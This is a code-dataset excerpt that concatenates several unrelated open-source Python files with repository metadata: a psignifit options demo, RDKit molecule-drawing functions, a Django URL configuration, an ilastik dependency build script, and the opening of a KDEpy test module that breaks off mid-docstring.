options['mbStepN'] = [25,20,10,10,20] """
''' This sets the number of grid points on each dimension in the final
fitting (stepN) and in the moving of borders mbStepN
the order is
[threshold,width,upper asymptote,lower asymptote,variance scaling]
You may change this if you need more accurate estimates on the sparsely
sampled parameters or if you want to play with them to save time '''
# for example to get an even more exact estimate on the
# lapse rate/upper asymptote plug in
options['stepN']=[40,40,50,20,20]
# now the lapse rate is sampled at 50 places giving you a much more exact
# and smooth curve for comparisons.
""" options['confP'] = .95 """
''' The confidence level for the computed confidence intervals.
This may be set to any number between 0 and 1 excluding. '''
# for example to get 99% confidence intervals try
options['confP'] = .99
# You may specify a vector as well. If you do the conf_intervals in the
# result will be a 5x2xN array containing the values for the different
# confidence levels in the 3rd dimension.
options['confP'] = [.95,.9,.68,.5]
# will return 4 confidence intervals for each parameter for example.
""" options['threshPC'] = .5 """
''' Which percent correct correspond to the threshold?
Given in Percent correct on the unscaled sigmoid (reaching from 0 to 1). '''
# For example to define the threshold as 90% correct try:
options['threshPC'] = .9
""" options['CImethod'] ='stripes' """
''' This sets how the confidence intervals are computed in getConfRegion
possible variants are:
'project' -> project the confidence region on each axis
'stripes' -> find a threshold with (1-alpha) above it
This will disregard intervals of low posterior probability and then move
in from the sides to adjust the exact CI size.
This can handle borders and asymmetric distributions slightly better, but
will introduce slight jumps of the confidence interval when confp is
adjusted depending on when the gridpoints get too small posterior
probability.
'percentiles' -> find alpha/2 and 1-alpha/2 percentiles
(alpha = 1-confP)
cuts at the estimated percentiles-> always tries to place alpha/2
posterior probability above and below the credible interval.
This has no jumping but will exclude border values even when they have
the highest posterior. Additionally it will not choose the area of
highest posterior density if the distribution is skewed. '''
""" options['priors'] = getStandardPriors() """
''' This field contains a cell array of function handles, which define the
priors for each parameter.
If you want to set your priors manually, here is the place for it.
For details on how do change these refer to
https://github.com/wichmann-lab/psignifit/wiki/Priors '''
#TODO change to the Python repo
""" options['betaPrior'] = 20 """
''' this sets the strength of the Prior in favor of a binomial observer.
Larger values correspond to a stronger prior. We choose this value after
a rather large number of simulations. Refer to the paper to learn more
about this '''
""" options['nblocks'] = inf """
""" options['poolMaxGap'] = inf """
""" options['poolMaxLength'] = 50 """
""" options['poolxTol'] = 0 """
''' these options set how your data is pooled into blocks. Your data is only
pooled if your data Matrix has more than nblocks lines. Then we pool
together a maximum of poolMaxLength trials, which are separated by a
maximum of poolMaxGap trials of other stimulus levels. If you want you may
specify a tolerance in stimulus level to pool trials, but by default we
only pool trials with exactly the same stimulus level. '''
""" options['instantPlot'] = 0 """
''' A boolean to control whether you immediately get 2 standard plots of your
fit. Turn to 1 to see the effect. '''
options['instantPlot'] = 1
""" options['borders'] """
''' In this field you may provide your own bounds for the parameters.
This should be a 5x2 matrix of start and end of the range for the 5
parameters. (threshold,width,upper asymptote,lower asymptote,variance
scale) '''
#For example this would set the borders to
# threshold between 1 and 2
# width between .1 and 5
# a fixed lapse rate of .05
# a fixed lower asymptote at .05
# a maximum on the variance scale of .2
options['borders']= [ 1,2, .1,5,.05,.05, .5,.5, exp(-20),.2]
''' NOTE: By this you artificially exclude all values out of this range. Only
exclude parameter values, which are truly impossible!'''
""" options['setBordersType'] = 0 """
''' The method to set the outer borders of the grid. You find it's use in
setBorders
defaults to reasonable estimates for the threshold and width parameter: '''
options['setBordersType'] = 0
# To set the borders for arbitrary parameterizations change to
options['setBordersType'] = 1
#But also see demo_003 on how to implement other parameterizations as all
# build in functions are parameterized by threshold and width
""" options['maxBorderValue'] = exp(-10) """
''' Parts of the grid which produce marginal values below this are considered
0 and are excluded from the calculation in moveBorders.m
it should be a very small value and at least smaller than 1/(max(stepN)) '''
# This for example would exclude fewer values and more conservative
# movement of the borders:
options['maxBorderValue'] = exp(-20)
""" options.moveBorders = 1 """
''' Toggles the movement of borders by moveBorders
Usually this is good to concentrate on the right area in the parameter
space. '''
options['moveBorders'] = 1
# If you set
options['moveBorders'] = 0
# your posterior will always use the initial setting for the borders.
# This is useful if you set the borders by hand and do not want
# psignifit to move them after this.
""" options['dynamicGrid'] = 0 """
''' Toggles the usage of a dynamic/adaptive grid.
there was hope for a more exact estimate by this, but although the curves
look smoother the confidence intervals were not more exact. Thus this is
deactivated by default. '''
options['dynamicGrid'] = 1
options['dynamicGrid'] = 0
# How many Likelihood evaluations are done per dimension to set the
# adaptive grid. Should be a relatively large number.
options['GridSetEval'] = 10000
# Only used with dynamic grid,--> by default not at all
''' options['UniformWeight'] = 0.5000
How many times the average is added to each position while setting the
adaptive grid. You may increase this number to get a more equally sampled
grid or decrease it to get an even stronger focus of the sampling on the
peak.
When you increase this value very much try to set options['dynamicGrid'] = 0
which produces an equal stepsize grid right away. '''
# As an example: Will produce a more focused grid which leaves the borders
# very weakly sampled.
options['UniformWeight'] = 0.01000
# Only used with dynamic grid,-> by default not at all
""" options['widthalpha'] = .05 """
''' This changes how the width of a psychometric function is defined
width= psi^(-1)(1-alpha) - psi^(-1)(alpha)
where psi^(-1) is the inverse of the sigmoid function.
widthalpha must be between 0 and .5 excluding '''
# Thus this would enable the useage of the interval from .1 to .9 as the
# width for example:
options['widthalpha'] = .1
""" options.logspace: = 0 """
''' this is triggered when you fit lognormal or Weibull functions, which are
fitted in logspace. This is an internal variable which is used to pass
this to all functions. It is of no interest for a user. '''
| Visdoom/psignifit-4.0 | demo_002.py | Python | gpl-3.0 | 11,305 | [
"Gaussian"
] | d2b5dcb62e069cf9df83c993f949592979d24d00d2d8fa8596252526bde7ca0c |
# $Id$
#
# Copyright (C) 2006-2011 Greg Landrum
# All Rights Reserved
#
import os
def _getCanvas():
    """Pick a drawing backend.

    Honours the RDKIT_CANVAS environment variable ('cairo', 'agg', or
    anything else for the sping backend); when it is unset or empty, probes
    cairo first, then agg, and finally falls back to sping.

    Returns a (useAGG, useCairo, Canvas) triple.
    """
    useAGG = False
    useCairo = False
    Canvas = None
    preference = os.environ.get('RDKIT_CANVAS', '').lower()
    if not preference:
        # No explicit choice made: try each backend in order of preference.
        try:
            from cairoCanvas import Canvas
            useCairo = True
        except ImportError:
            try:
                from aggCanvas import Canvas
                useAGG = True
            except ImportError:
                from spingCanvas import Canvas
    elif preference == 'cairo':
        from cairoCanvas import Canvas
        useCairo = True
    elif preference == 'agg':
        from aggCanvas import Canvas
        useAGG = True
    else:
        # Unrecognized value: use the sping backend.
        from spingCanvas import Canvas
    return useAGG, useCairo, Canvas
def _createCanvas(size):
    """Create an (image, canvas) pair of the given pixel size using the best
    available backend (see _getCanvas)."""
    useAGG, useCairo, Canvas = _getCanvas()
    if useAGG or useCairo:
        import Image
        img = Image.new("RGBA", size, "white")
        canvas = Canvas(img)
    else:
        # BUG FIX: MolDrawing was referenced here without being imported
        # anywhere at module level, so the sping fallback raised a NameError.
        from MolDrawing import MolDrawing
        MolDrawing.radicalSymbol = '.'  # <- the sping canvas doesn't support unicode well
        from spingCanvas import Canvas
        canvas = Canvas(size=size, name='MolToImageFile')
        img = canvas._image
    return img, canvas
def MolToImage(mol, size=(300,300), kekulize=True, wedgeBonds=True,
               **kwargs):
  """ returns a PIL image containing a drawing of the molecule

    Keyword arguments:
    kekulize -- run kekulization routine on input `mol` (default True)
    size -- final image size, in pixel (default (300,300))
    wedgeBonds -- draw wedge (stereo) bonds (default True)
    highlightAtoms -- list of atoms to highlight (default [])
    highlightMap -- dictionary of (atom, color) pairs (default None)
    highlightBonds -- list of bonds to highlight (default [])
    legend -- optional caption drawn under the molecule
    returnCanvas -- if true, return (img, canvas, drawer) without flushing
  """
  from MolDrawing import MolDrawing
  if not mol:
    raise ValueError,'Null molecule provided'
  img,canvas=_createCanvas(size)
  drawer = MolDrawing(canvas)
  if kekulize:
    # Work on a copy so the caller's molecule is not modified.
    from rdkit import Chem
    mol = Chem.Mol(mol.ToBinary())
    Chem.Kekulize(mol)
  if not mol.GetNumConformers():
    # No 2D coordinates yet: generate them before drawing.
    from rdkit.Chem import AllChem
    AllChem.Compute2DCoords(mol)
  drawer.wedgeDashedBonds=wedgeBonds
  # 'legend' is consumed here; the remaining kwargs go to AddMol().
  if kwargs.has_key('legend'):
    legend = kwargs['legend']
    del kwargs['legend']
  else:
    legend=''
  drawer.AddMol(mol,**kwargs)
  if legend:
    from rdkit.Chem.Draw.MolDrawing import Font
    bbox = drawer.boundingBoxes[mol]
    pos = size[0]/2,int(.94*size[1]) # the 0.94 is extremely empirical
    # canvas.addCanvasPolygon(((bbox[0],bbox[1]),(bbox[2],bbox[1]),(bbox[2],bbox[3]),(bbox[0],bbox[3])),
    #                         color=(1,0,0),fill=False,stroke=True)
    # canvas.addCanvasPolygon(((0,0),(0,size[1]),(size[0],size[1]),(size[0],0) ),
    #                         color=(0,0,1),fill=False,stroke=True)
    font=Font(face='sans',size=12)
    canvas.addCanvasText(legend,pos,font)
  if kwargs.get('returnCanvas',False):
    return img,canvas,drawer
  else:
    canvas.flush()
    return img
def MolToFile(mol,fileName,size=(300,300),kekulize=True, wedgeBonds=True,
              imageType=None,**kwargs):
  """ Generates a drawing of a molecule and writes it to a file

    The image format is taken from `imageType`, or, when that is None,
    inferred from the file name's extension.
  """
  from MolDrawing import MolDrawing
  # original contribution from Uwe Hoffmann
  if not fileName:
    raise ValueError,'no fileName provided'
  if not mol:
    raise ValueError,'Null molecule provided'
  if imageType is None:
    # e.g. 'mol.png' -> 'png'
    imageType=os.path.splitext(fileName)[1][1:]
  useAGG,useCairo,Canvas = _getCanvas()
  if useCairo or useAGG:
    canvas = Canvas(size=size,imageType=imageType,
                    fileName=fileName)
  else:
    MolDrawing.radicalSymbol='.' #<- the sping canvas doesn't support unicode well
    canvas = Canvas(size=size,name=fileName,imageType=imageType)
  drawer = MolDrawing(canvas)
  if kekulize:
    # Work on a copy so the caller's molecule is not modified.
    from rdkit import Chem
    mol = Chem.Mol(mol.ToBinary())
    Chem.Kekulize(mol)
  if not mol.GetNumConformers():
    from rdkit.Chem import AllChem
    AllChem.Compute2DCoords(mol)
  drawer.wedgeDashedBonds=wedgeBonds
  drawer.AddMol(mol,**kwargs)
  # cairo/agg canvases write on flush(); the sping canvas on save().
  if useCairo or useAGG:
    canvas.flush()
  else:
    canvas.save()
def MolToImageFile(mol,filename,size=(300,300),kekulize=True, wedgeBonds=True,
                   **kwargs):
  """ DEPRECATED: please use MolToFile instead

    Draws the molecule with MolToImage() and saves the PIL image to
    `filename`.
  """
  img = MolToImage(mol,size=size,kekulize=kekulize,wedgeBonds=wedgeBonds,**kwargs)
  img.save(filename)
# Module-level Tkinter state reused across ShowMol() calls so repeated calls
# update the same window instead of opening a new one each time.
tkRoot=None
tkLabel=None
tkPI=None
def ShowMol(mol,size=(300,300),kekulize=True,wedgeBonds=True,
            title='RDKit Molecule',**kwargs):
  """ Generates a picture of a molecule and displays it in a Tkinter window

    The first call creates the window; subsequent calls paste the new image
    into the existing window (see the module-level tkRoot/tkLabel/tkPI).
  """
  global tkRoot,tkLabel,tkPI
  import Tkinter
  import ImageTk
  img = MolToImage(mol,size,kekulize,wedgeBonds,**kwargs)
  if not tkRoot:
    # First call: build the window and the label holding the image.
    tkRoot = Tkinter.Tk()
    tkRoot.title(title)
    tkPI = ImageTk.PhotoImage(img)
    tkLabel = Tkinter.Label(tkRoot,image=tkPI)
    tkLabel.place(x=0,y=0,width=img.size[0],height=img.size[1])
  else:
    # Reuse the existing window; just swap in the new pixels.
    tkPI.paste(img)
  tkRoot.geometry('%dx%d'%(img.size))
def MolToMPL(mol,size=(300,300),kekulize=True, wedgeBonds=True,
             imageType=None,**kwargs):
  """ Generates a drawing of a molecule on a matplotlib canvas

    Side effect: stores the rescaled atom positions on the input molecule
    as mol._atomPs (used later by calcAtomGaussians()).
    Returns the matplotlib figure.
  """
  if not mol:
    raise ValueError,'Null molecule provided'
  from MolDrawing import MolDrawing
  from mplCanvas import Canvas
  canvas = Canvas(size)
  drawer = MolDrawing(canvas)
  # Keep a handle on the original molecule; drawing may use a copy below.
  omol=mol
  if kekulize:
    from rdkit import Chem
    mol = Chem.Mol(mol.ToBinary())
    Chem.Kekulize(mol)
  if not mol.GetNumConformers():
    from rdkit.Chem import AllChem
    AllChem.Compute2DCoords(mol)
  drawer.wedgeDashedBonds=wedgeBonds
  drawer.AddMol(mol,**kwargs)
  # Attach atom positions (rescaled to canvas coordinates) to the original
  # molecule object.
  omol._atomPs=drawer.atomPs[mol]
  for k,v in omol._atomPs.iteritems():
    omol._atomPs[k]=canvas.rescalePt(v)
  # 100 dpi assumed when converting pixels to inches.
  canvas._figure.set_size_inches(float(size[0])/100,float(size[1])/100)
  return canvas._figure
def calcAtomGaussians(mol,a=0.03,step=0.02,weights=None):
  """
  Computes a sum of 2D Gaussians, one per atom, on a uniform grid over the
  unit square.  Atom positions are taken from mol._atomPs (as set by
  MolToMPL()), each Gaussian has isotropic width `a`, and the contribution
  of atom i is scaled by weights[i] (all ones by default).

  Returns (X, Y, Z) meshgrid arrays suitable for matplotlib's imshow/contour.

  useful things to do with these:
  fig.axes[0].imshow(z,cmap=cm.gray,interpolation='bilinear',origin='lower',extent=(0,1,0,1))
  fig.axes[0].contour(x,y,z,20,colors='k')
  fig=Draw.MolToMPL(m);
  contribs=Crippen.rdMolDescriptors._CalcCrippenContribs(m)
  logps,mrs=zip(*contribs)
  x,y,z=Draw.calcAtomGaussians(m,0.03,step=0.01,weights=logps)
  fig.axes[0].imshow(z,cmap=cm.jet,interpolation='bilinear',origin='lower',extent=(0,1,0,1))
  fig.axes[0].contour(x,y,z,20,colors='k',alpha=0.5)
  fig.savefig('coumlogps.colored.png',bbox_inches='tight')
  """
  import numpy
  # bug fix: matplotlib.mlab.bivariate_normal was removed in matplotlib 3.1,
  # so importing it breaks on any modern installation.  Compute the
  # uncorrelated (sigma_x == sigma_y == a, sigma_xy == 0) bivariate normal
  # pdf directly with numpy; this is numerically identical to the old call
  # mlab.bivariate_normal(X, Y, a, a, mux, muy).
  def _gauss2d(X, Y, mux, muy):
    return numpy.exp(-((X - mux)**2 + (Y - muy)**2) / (2.0 * a * a)) / (2.0 * numpy.pi * a * a)
  x = numpy.arange(0, 1, step)
  y = numpy.arange(0, 1, step)
  X, Y = numpy.meshgrid(x, y)
  if weights is None:
    weights = [1.] * mol.GetNumAtoms()
  Z = _gauss2d(X, Y, mol._atomPs[0][0], mol._atomPs[0][1]) * weights[0]
  for i in range(1, mol.GetNumAtoms()):
    Z += _gauss2d(X, Y, mol._atomPs[i][0], mol._atomPs[i][1]) * weights[i]
  return X, Y, Z
def MolsToImage(mols, subImgSize=(200,200),legends=None,**kwargs):
  """ Draws a sequence of molecules side by side in a single row and
    returns the result as one PIL image.  `legends`, when given, provides
    one caption per molecule; remaining kwargs go to MolToImage().
  """
  import Image
  if legends is None: legends = [None]*len(mols)
  # One row: total width is n cells wide, one cell high.
  res = Image.new("RGB",(subImgSize[0]*len(mols),subImgSize[1]))
  for i,mol in enumerate(mols):
    res.paste(MolToImage(mol,subImgSize,legend=legends[i],**kwargs),(i*subImgSize[0],0))
  return res
def MolsToGridImage(mols,molsPerRow=3,subImgSize=(200,200),legends=None,**kwargs):
  """ Draws a sequence of molecules in a grid and returns one PIL image.

    Arguments:
      mols -- the molecules to draw
      molsPerRow -- number of columns in the grid (default 3)
      subImgSize -- (width, height) in pixels of each grid cell
      legends -- optional per-molecule captions (same length as mols)
    Remaining keyword arguments are passed through to MolToImage().
  """
  import Image
  if legends is None: legends = [None]*len(mols)
  # Number of rows: ceiling of len(mols)/molsPerRow.
  nRows = len(mols)//molsPerRow
  if len(mols)%molsPerRow : nRows+=1
  # bug fix: total width is columns * cell *width* (subImgSize[0]); the
  # original used subImgSize[1] (the height), which produced a wrongly
  # sized image for non-square cells.
  res = Image.new("RGB",(molsPerRow*subImgSize[0],nRows*subImgSize[1]),(255,255,255))
  for i,mol in enumerate(mols):
    row = i//molsPerRow
    col = i%molsPerRow
    res.paste(MolToImage(mol,subImgSize,legend=legends[i],**kwargs),(col*subImgSize[0],row*subImgSize[1]))
  return res
def ReactionToImage(rxn, subImgSize=(200,200),**kwargs):
  """ Draws a chemical reaction as a single-row PIL image:
    reactants, then a hand-drawn arrow cell, then products.
  """
  import Image
  # Collect the templates to draw; None marks the arrow cell between
  # reactants and products.
  mols = []
  for i in range(rxn.GetNumReactantTemplates()):
    tmpl=rxn.GetReactantTemplate(i)
    tmpl.UpdatePropertyCache(False)
    mols.append(tmpl)
  mols.append(None)
  for i in range(rxn.GetNumProductTemplates()):
    tmpl = rxn.GetProductTemplate(i)
    tmpl.UpdatePropertyCache(False)
    mols.append(tmpl)
  res = Image.new("RGB",(subImgSize[0]*len(mols),subImgSize[1]),(255,255,255))
  for i,mol in enumerate(mols):
    if mol is not None:
      nimg = MolToImage(mol,subImgSize,kekulize=False,**kwargs)
    else:
      # Arrow cell: a horizontal line with a two-stroke arrowhead.
      nimg,canvas = _createCanvas(subImgSize)
      p0 = (10,subImgSize[1]//2)
      p1 = (subImgSize[0]-10,subImgSize[1]//2)
      p3 = (subImgSize[0]-20,subImgSize[1]//2-10)
      p4 = (subImgSize[0]-20,subImgSize[1]//2+10)
      canvas.addCanvasLine(p0,p1,lineWidth=2,color=(0,0,0))
      canvas.addCanvasLine(p3,p1,lineWidth=2,color=(0,0,0))
      canvas.addCanvasLine(p4,p1,lineWidth=2,color=(0,0,0))
      if hasattr(canvas,'flush'):
        canvas.flush()
      else:
        canvas.save()
    res.paste(nimg,(i*subImgSize[0],0))
  return res
| rdkit/rdkit-orig | rdkit/Chem/Draw/__init__.py | Python | bsd-3-clause | 8,895 | [
"RDKit"
] | fccc71065524c2b1993c36ab0cf92ec238116f464a045c4bec4c57b2f258732b |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.http import HttpResponse
from django.views.generic import TemplateView
from django.views import defaults as default_views
from django.contrib.sitemaps.views import sitemap
from views import HomeView, contact_us
# NOTE(review): duplicate import -- HomeView is already imported on the
# previous line.
from views import HomeView
from .sitemaps import StaticViewSitmap, NewsSiteMap

# Root URL configuration: site pages, member/flatpage apps, robots.txt,
# sitemap, admin and auth, plus media files in development.
urlpatterns = [
    url(r'^$', HomeView.as_view(), name='home'),
    url(r'^contact_us$', contact_us, name='contact_us'),
    url(r'^members/', include('members.urls', namespace='members')),
    url(r'^flatpages/', include('flatpages.urls', namespace='flatpages')),

    # robots.txt: keep all crawlers out of the members area
    url(r'^robots\.txt$',
        lambda r: HttpResponse('User-agent: *\nDisallow: /members/*', content_type='text/plain')),

    # sitemaps
    # NOTE(review): only the static sitemap is registered; NewsSiteMap is
    # imported above but unused -- confirm that is intentional.
    url(r'^sitemap\.xml$', sitemap,
        {'sitemaps': {'static': StaticViewSitmap}},
        name='django.contrib.sitemaps.views.sitemap'),

    # Django Admin, use {% url 'admin:index' %}
    url(settings.ADMIN_URL, include(admin.site.urls)),

    # User management
    url(r'^users/', include('users.urls', namespace='users')),
    url(r'^accounts/', include('allauth.urls')),

    # Your stuff: custom urls includes go here
    url(r'^summernote/', include('django_summernote.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

if settings.DEBUG:
    # This allows the error pages to be debugged during development, just visit
    # these url in browser to see how these error pages look like.
    urlpatterns += [
        url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception('Bad Request!')}),
        url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception('Permission Denied')}),
        url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception('Page not Found')}),
        url(r'^500/$', default_views.server_error),
    ]
| mooja/ssip3 | app/config/urls.py | Python | mit | 2,068 | [
"VisIt"
] | b8003300f17bb24110ac849bf5d92bfbe7a11942ef5971e96fb670ead0926ea2 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2010 L Fiaschi, T Kroeger, M Nullmaier C Sommer, C Straehle, U Koethe, FA Hamprecht.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE ABOVE COPYRIGHT HOLDERS ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those of the
# authors and should not be interpreted as representing official policies, either expressed
# or implied, of their employers.
import __builtin__
import platform
import urllib2, os, sys, tarfile, shutil
from hashlib import md5

# Build configuration is stuffed into the __builtin__ module so that every
# package module imported below (PackagesItems) can see these names as
# globals without importing anything.
####__builtin__.installDir="/ilastik"
__builtin__.installDir = os.environ["HOME"]
__builtin__.pythonVersion="2.7"
# Paths to the host toolchain and common shell utilities.
__builtin__.gcc="/usr/bin/gcc"
__builtin__.gpp="/usr/bin/g++"
__builtin__.ls="/bin/ls"
__builtin__.cd="cd"
__builtin__.make="/usr/bin/make"
__builtin__.pwd="/bin/pwd"
# Tool locations differ between macOS (Darwin) and Linux.
if platform.system() == "Darwin":
    __builtin__.cmake="/usr/local/bin/cmake"
    __builtin__.hg="/usr/local/bin/hg"
    __builtin__.git="/usr/local/git/bin/git"
else:
    __builtin__.cmake="/usr/bin/cmake"
    __builtin__.hg="/usr/bin/hg"
    __builtin__.git="/usr/bin/git"
# On macOS Python is installed as a framework; elsewhere directly under
# installDir.
if platform.system() == "Darwin":
    __builtin__.pythonVersionPath = installDir+"/Frameworks/Python.framework/Versions/"+pythonVersion
else:
    __builtin__.pythonVersionPath = installDir
__builtin__.pythonBinaryPath = pythonVersionPath+"/bin"
__builtin__.pythonSharePath = pythonVersionPath+"/share"
if platform.system() == "Darwin":
    __builtin__.pythonLibrary = pythonVersionPath+"/lib/libpython"+pythonVersion+".dylib"
else:
    __builtin__.pythonLibrary = pythonVersionPath+"/lib/libpython"+pythonVersion+".so"
__builtin__.pythonExecutable = pythonBinaryPath + "/python" + pythonVersion
__builtin__.pythonSitePackages = pythonVersionPath + "/lib/python" + pythonVersion + "/site-packages"
__builtin__.pythonIncludePath = pythonVersionPath + "/include/python" + pythonVersion
from PackagesItems import *
# Create the initial structure of the project ######################################################
def mkdir(dir):
    """Create directory `dir` (including parents); no-op if it already exists."""
    if os.path.exists(dir):
        return
    os.makedirs(dir)
# Create the initial structure of the project ######################################################
mkdir('distfiles')
mkdir('work')
mkdir(installDir)
mkdir(installDir+'/lib')
mkdir(installDir+'/bin')
mkdir(installDir+'/include')
mkdir(installDir+'/Frameworks')
###################################################################################################
#IHOME=os.getcwd()
#print "Setting IHOME to" + IHOME
#os.environ["IHOME"]=IHOME
# Point cmake and the compilers at the private install prefix.
os.environ["CMAKE_PREFIX_PATH"] = installDir
os.environ["CMAKE_INSTALL_PREFIX"] = installDir
os.environ["CMAKE_INCLUDE_PATH"] = installDir+"/include"
os.environ["CMAKE_LIBRARY_PATH"] = installDir+"/lib"
# NOTE(review): missing '/' between installDir and "bin" -- this yields e.g.
# "/home/userbin:/usr/bin:/bin"; confirm whether "/bin" was intended.
os.environ["PATH"] = installDir+"bin:/usr/bin:/bin"
os.environ["LIBRARY_PATH"] = installDir+"/lib"
os.environ["C_INCLUDE_PATH"] = installDir+"/include"
os.environ["CPLUS_INCLUDE_PATH"] = installDir+"/include"
os.environ["PREFIX"] = installDir
os.environ['QTDIR'] = installDir
os.environ['PYTHONAPPSDIR'] = installDir + '/Applications/'
if platform.system() == "Darwin":
    # macOS: build 64-bit against the private frameworks directory.
    os.environ["CMAKE_FRAMEWORK_PATH"] = installDir+"/Frameworks"
    #Packages that use setuptools have to know where Python is installed
    #see: http://stackoverflow.com/questions/3390558/installing-setuptools-in-a-private-version-of-python
    os.environ["FRAMEWORK_PATH"] = installDir+"/Frameworks"
    os.environ["CC"] = gcc+" -arch x86_64"
    os.environ["CXX"] = gpp+" -arch x86_64"
    os.environ["LDFLAGS"] = "-arch x86_64"
    os.environ["BASEFLAGS"] = "-arch x86_64"
    os.environ["LDFLAGS"] = "-L"+installDir+"/lib" + " " + "-F"+installDir+"/Frameworks"
    os.environ["CPPFLAGS"] = "-I"+installDir+"/include"
    os.environ["MACOSX_DEPLOYMENT_TARGET"]="10.6"
else:
    os.environ["LD_LIBRARY_PATH"] = "%s/lib" % (installDir,)
###################################################################################################
# Full build order; 'all' on the command line expands to this list.
all = ['fftw3f', 'fftw3', 'jpeg', 'tiff', 'zlib','png', 'slib',
       'python', 'nose', 'setuptools', 'py2app',
       'hdf5',
       'numpy', 'h5py', 'boost', 'sip',
       'lis', 'vigra',
       'qt', 'pyqt', 'qimage2ndarray',
       'pyopenglaccellerate', 'pyopengl',
       'enthoughtbase', 'traits', 'traitsgui', 'traitsbackendqt',
       'vtk',
       'greenlet',
       'psutil',
       'fixes']
#if platform.system() == "Darwin":
#    all.append('py2app')
# Command-line handling: package names are passed as arguments; 'all'
# expands to every package; 'from <pkg>' appends every package from <pkg>
# onward in build order.
c = sys.argv[1:]
if 'all' in c:
    c = all
#os.system("rm -rf " + installDir + "/*")
if 'from' in c:
    startpackage=c[1]
    try:
        index=all.index(startpackage)
    # NOTE(review): bare except hides real errors (e.g. typos raise
    # ValueError from list.index); also the message lacks a space before
    # 'not known'.
    except:
        raise RuntimeError('package ' + startpackage + 'not known')
    for i in range(index,len(all)):
        print all[i]
        c.append(all[i])
# Dispatch: each selected package name triggers its build routine from
# PackagesItems, in dependency order.
if 'fftw3f' in c:
    FFTW3F()
if 'fftw3' in c:
    FFTW3()
if 'jpeg' in c:
    JpegPackage()
if 'tiff' in c:
    TiffPackage()
if 'zlib' in c:
    ZlibPackage()
if 'png' in c:
    PngPackage()
if 'slib' in c:
    SlibPackage()
# # # # # # # # # # # # #
# From here on the freshly built private Python must be used, so expose it
# on PYTHONPATH/PATH before building Python-based packages.
os.environ["PYTHONPATH"] = pythonSitePackages #installDir+"/bin:" + pythonSitePackages
os.environ["PATH"] = os.environ["PATH"] + ':' + pythonBinaryPath
if 'python' in c:
    PythonPackage()
if 'nose' in c:
    NosePackage()
if 'setuptools' in c:
    SetuptoolsPackage()
if platform.system() == "Darwin":
    if 'py2app' in c:
        Py2appPackage()
# # # # # # # # # # # # #
if 'hdf5' in c:
    Hdf5Package()
# # # # # # # # # # # # #
if 'numpy' in c:
    NumpyPackage()
if 'h5py' in c:
    H5pyPackage()
if 'boost' in c:
    BoostPackage()
if 'sip' in c:
    SipPackage()
# # # # # # # # # # # # #
if 'lis' in c:
    LISPackage()
if 'vigra' in c:
    ##############################################CStraehlePackage()
    VigraPackage()
# # # # # # # # # # # # #
if 'qt' in c:
    QtPackage()
if 'pyqt' in c:
    PyQtPackage()
if 'qimage2ndarray' in c:
    Qimage2ndarrayPackage()
# # # # # # # # # # # # #
if 'pyopenglaccellerate' in c:
    PyOpenGLAccelleratePackage()#
if 'pyopengl' in c:
    PyOpenGLPackage()
# # # # # # # # # # # # #
if 'enthoughtbase' in c:
    EnthoughtBasePackage()
if 'traits' in c:
    TraitsPackage()
if 'traitsgui' in c:
    TraitsGUIPackage()
if 'traitsbackendqt' in c:
    TraitsBackendQtPackage()
# # # # # # # # # # # # #
if 'vtk' in c:
    VTKGitPackage()
# # # # # # # # # # # # #
#New Stuff for the Graph
if "greenlet" in c:
    GreenletPackage()
if "psutil" in c:
    PsutilPackage()
#########################
# Post-install workarounds; skipped when this script is run in
# download-only mode.
if ('fixes' in c) and ('download' not in sys.argv[0]):
    if platform.system() == "Darwin":
        cmd = "cp -rv work/" + QtPackage.workdir + "/src/gui/mac/qt_menu.nib "+installDir+"/lib"
        print "Workaround #1: ", cmd
        os.system(cmd)
        cmd = "mv %s/PyQt4/uic/port_v3 %s/PyQt4/uic/_port_v3" % (pythonSitePackages, pythonSitePackages)
        print "Workaround #2: ", cmd
        os.system(cmd)
        cmd = "cp -rv work/vigra/vigranumpy/src/core/vigranumpycore.so "+installDir+"/lib"
        print "Workaround #3: ", cmd
        os.system(cmd)
| ilastik/ilastik-0.5 | scripts/install-ilastik-deps.py | Python | bsd-2-clause | 8,354 | [
"VTK"
] | 3073048f733e6c36f5302ce5564912cfb4249c26e70fcfe0b1d43e066f663c70 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Tests for the NaiveKDE. The NaiveKDE is tested against various properties, and
in turn more advanced implementations are tested against the NaiveKDE.
"""
import numpy as np
from KDEpy.NaiveKDE import NaiveKDE
import itertools
import pytest
# Cartesian product of sample data sets and split indices used to
# parametrize the additivity tests below.
args = list(itertools.product([[-1, 0, 1, 10], [1, 2, 3, 4], [1, 1, 1, 2]], [1, 2, 3]))


@pytest.mark.parametrize("data, split_index", args)
def test_additivity(data, split_index):
    """
    Test the additive property of the KDE: the KDE of the full data set
